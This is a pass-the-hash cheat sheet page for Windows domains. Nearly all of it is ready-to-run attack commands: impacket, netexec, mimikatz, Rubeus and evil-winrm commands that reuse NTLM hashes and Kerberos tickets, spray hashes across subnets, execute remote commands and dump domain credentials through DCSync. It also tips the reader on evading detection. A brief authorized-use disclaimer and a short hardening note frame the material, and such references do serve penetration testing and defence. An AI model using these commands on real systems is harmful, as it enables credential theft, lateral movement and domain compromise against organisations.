← All cheat sheets

PASS-THE-HASH

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Reuse captured credential material (NTLM hash, Kerberos keys, tickets) to
authenticate without the cleartext password. Authorized engagements only.

PASS-THE-HASH (NTLM)#

Use the NT hash directly against SMB/WMI/WinRM:
  impacket (LM:NT or :NT):
    psexec.py   -hashes :<NT>  DOMAIN/user@host
    wmiexec.py  -hashes :<NT>  DOMAIN/user@host
    smbexec.py / atexec.py / dcomexec.py   -hashes :<NT> ...
  netexec (CME successor):
    nxc smb <subnet> -u user -H <NT>            # spray a hash across hosts
    nxc smb host -u user -H <NT> -x "whoami"    # exec
  mimikatz:
    sekurlsa::pth /user:u /domain:d /ntlm:<NT> /run:cmd.exe
  evil-winrm:
    evil-winrm -i host -u user -H <NT>
  RDP (Restricted Admin mode): xfreerdp /u:user /pth:<NT> /v:host

OVERPASS-THE-HASH (HASH -> KERBEROS)#

Turn an NT/AES key into a Kerberos TGT (quieter; uses Kerberos not NTLM):
  rubeus: Rubeus.exe asktgt /user:u /rc4:<NT> /domain:d /ptt
          Rubeus.exe asktgt /user:u /aes256:<key> /domain:d /ptt   (preferred)
  impacket: getTGT.py -hashes :<NT> DOMAIN/user ; export KRB5CCNAME=user.ccache

PASS-THE-TICKET#

Reuse a .kirbi/.ccache TGT or TGS:
  mimikatz: sekurlsa::tickets /export ; kerberos::ptt <ticket>.kirbi
  rubeus:   Rubeus.exe ptt /ticket:<base64 or file>
  impacket: export KRB5CCNAME=ticket.ccache ; psexec.py -k -no-pass d/u@host
  convert:  ticketConverter.py in.kirbi out.ccache

DUMP HASHES / KEYS#

  secretsdump.py DOMAIN/user@host               # local SAM + LSA + (DC) NTDS
  secretsdump.py -just-dc DOMAIN/user@dc         # DCSync whole domain
  mimikatz: sekurlsa::logonpasswords ; lsadump::sam ; lsadump::dcsync

NOTES#

- PtH works for NTLM auth; AES-only / Protected Users / Credential Guard breaks RC4 PtH.
- Prefer AES overpass-the-hash to avoid 4776/RC4 anomalies.
- Local admin hash reuse across machines = lateral movement; LAPS defeats it.

HARDENING (blue-team note)#

LAPS (unique local admin pw), Protected Users group, Credential Guard, disable
RID-500 network logon, tiered admin, and monitor 4624 type 3/9, 4768/4769.